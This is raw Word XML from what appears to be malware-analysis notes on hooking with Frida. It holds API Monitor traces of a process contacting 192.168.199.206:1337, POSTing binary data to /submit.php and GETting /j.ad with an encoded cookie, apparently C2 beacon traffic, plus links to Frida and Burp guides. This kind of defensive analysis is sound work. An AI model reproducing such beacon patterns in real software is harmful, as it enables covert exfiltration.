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https://www.youtube.com/watch?v=wPepicuHDzs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https://techblog.mediaservice.net/2018/04/brida-a-step-by-step-user-guide/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https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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28140</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10:20:51.002 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">KERNELBASE.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">InternetConnectA ( 0x00cc0010, "192.168.199.206", 1337, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1 )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00cc0014</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0.0000110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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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28146</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10:20:51.002 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">KERNELBASE.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">HttpOpenRequestA ( 0x00cc0014, "POST", "/submit.php?id=25013", NULL, NULL, 0x02e1ee08, INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD, 0 )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00cc0018</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0.0000274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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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28151</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10:20:51.002 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">KERNELBASE.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">HttpSendRequestA ( 0x00cc0018, "Content-Type: application/octet-stream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", 40, 0x050cdf48, 4468 )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">TRUE</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0.0053667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___________________________________________________________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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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28397</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10:21:51.010 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">KERNELBASE.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">InternetConnectA ( 0x00cc0010, "192.168.199.206", 1337, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1 )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00cc0014</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0.0002267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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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28455</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10:21:51.011 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">KERNELBASE.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">HttpOpenRequestA ( 0x00cc0014, "GET", "/j.ad", NULL, NULL, 0x02e1ed40, INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD, 0 )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x00cc0018</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0.0000387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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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28460</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10:21:51.011 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">KERNELBASE.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">HttpSendRequestA ( 0x00cc0018, "Cookie: YSldgG2eNllJHM7BTCsOfb6W3edcIj2VPZABf2pYbhe18rcO3HB3tq2VLsRUev8sSkHD5eYmmHsq/vRGyAhtNjV/ZRbsEnzVsFM6zoHgPqr9304MhvVlkdp/l2IH8kMA8RPEPq+LN9FjDyKIv/tVUQIHR30AwX+GC98UJANBu+k=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", 182, NULL, 0 )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">TRUE</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0.0501686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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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240</w:t>
        <w:tab/>
        <w:t xml:space="preserve">6:47:26.431 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">RPCRT4.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">NtQuerySystemInformation ( SystemBasicInformation, 0x030efbf0, 44, NULL )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">STATUS_SUCCESS</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0.0000014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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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286</w:t>
        <w:tab/>
        <w:t xml:space="preserve">6:47:26.432 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">KERNELBASE.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">RtlQueryEnvironmentVariable ( NULL, "_CLUSTER_NETWORK_NAME_", 22, 0x00662550, 16, 0x030efbf0 )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">STATUS_VARIABLE_NOT_FOUND</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0xc0000100 = Indicates the specified environment variable name was not found in the specified environment block. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0.0000062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84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_____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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Time of Day</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Thread</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Module</w:t>
        <w:tab/>
        <w:t xml:space="preserve">API</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Return Value</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Error</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Duration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39310</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10:53:51.750 PM</w:t>
        <w:tab/>
        <w:t xml:space="preserve">3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">KERNELBASE.dll</w:t>
        <w:tab/>
        <w:t xml:space="preserve">HttpSendRequestA ( 0x00cc0018, "Content-Type: application/octet-stream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", 40, 0x035b3178, 312 )</w:t>
        <w:tab/>
        <w:t xml:space="preserve">TRUE</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0.0179217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https://github.com/OALabs/frida-extract/blob/master/FridaExtract.py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https://dmaasland.github.io/posts/mcafee.html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https://sensepost.com/blog/2019/recreating-known-universal-windows-password-backdoors-with-frida/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https://wiremask.eu/articles/hooking-firefox-with-frida/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https://www.kitploit.com/2018/11/frida-wshook-script-analysis-tool-based.html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maasland.github.io/posts/mcafee.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OALabs/frida-extract/blob/master/FridaExtract.py" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiremask.eu/articles/hooking-firefox-with-frida/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sensepost.com/blog/2019/recreating-known-universal-windows-password-backdoors-with-frid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hyperlink" Target="https://www.kitploit.com/2018/11/frida-wshook-script-analysis-tool-based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wPepicuHDzs" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techblog.mediaservice.net/2018/04/brida-a-step-by-step-user-guide/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-t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